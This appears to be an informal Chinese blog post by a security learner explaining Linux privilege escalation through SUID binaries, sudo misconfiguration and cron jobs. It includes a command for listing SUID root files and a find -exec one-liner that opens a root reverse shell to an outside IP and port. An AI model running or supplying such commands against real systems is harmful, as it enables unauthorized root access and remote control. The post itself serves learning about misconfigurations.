本来是想更新PTH的,但我鸽了,那就来讲讲Linux的提权吧!!主要是下周我就要学免杀了啦!!! 对于内网,什么难学???
是的,确实呢!!!比如免杀就不好学,而且资源难找
hhhh
呃呃呃,扯远了,先来讲一下今天要说的Linux提权吧!!!!!
1.SUID提权
先来讲讲什么是SUID吧
当root配置不当的时候,就有可能会发生提权,比如,当这些命令被赋予了特权的时候就可以提权
那么下面这一条命令可以查看什么命令被赋予了特权
find / -user root -perm -4000 -print 2>/dev/null
还是来解释一下它的参数
- / 指的是从根目录下开始寻找
- -user 指的是指定查找的用户 root 就是查找root的意思
- -perm 用于指定搜索具有特定权限的文件
- -4000 表示具有 setsuid 位置的文件
- -print 输出
- 2>/dev/null 2表示标准的错误输出流 /dev/null 是一个特殊的文件,用于丢弃数据
所以以上的命令的意思就是
从根目录下开始查找setsuid所属者为root的文件,并将它们标准的错误输出流丢到(只输出正确的结果)
假设你能看见一个find!!!!! 那我们就拿这个来举例子
那么就可以去执行以下的命令
find /etc/passwd -exec "你要执行的命令" \;
相当于直接给了你一个bash 还是root权限 ,那么是不是就可以反弹shell!!
find /etc/passwd -exec bash -c "bash -i >& /dev/tcp/192.168.246.1/9191 0>&1 " \;
可以看见是成功的反弹shell了!!!
当然了,通过其他命令的反弹方式还有很多,我以后有机会再讲(我又鸽了!!!)
2.Sudo提权
那么当我们拿下一台Linux之后,如果不是root,我们可以查看一下是否存在错误配置,可以提权
sudo -l //这个前提是你要知道当前账号的密码
如果你看到这样,那么说明你没有任何的sudo的权限!!!
如果你能看见这样,说明你是可以通过python进行提权的
那么下面我们就来复现一下
可以看见我们通过python完成了不知道root密码下的root提权,不信,你也可以去你的python中去试试
3.计划任务提权
这个我在以前的博客讲过,通过看这个文件,可以看见它的计划任务
但是改这个文件一般也是要root权限,所以你想直接加一个反弹shell的命令基本上都是不行的
所以还是只能看一下它有没有一些错误的配置了,所以不知道大家发现没有
以上讲到的三个,基本上都是涉及到了一些错误的配置导致的提权!!!
以上就是今天的内容了,当然了,Linux的提权还有很多的方式,我只是讲了我学的
对于Linux提权,还有很多,等我以后学了一定更!!!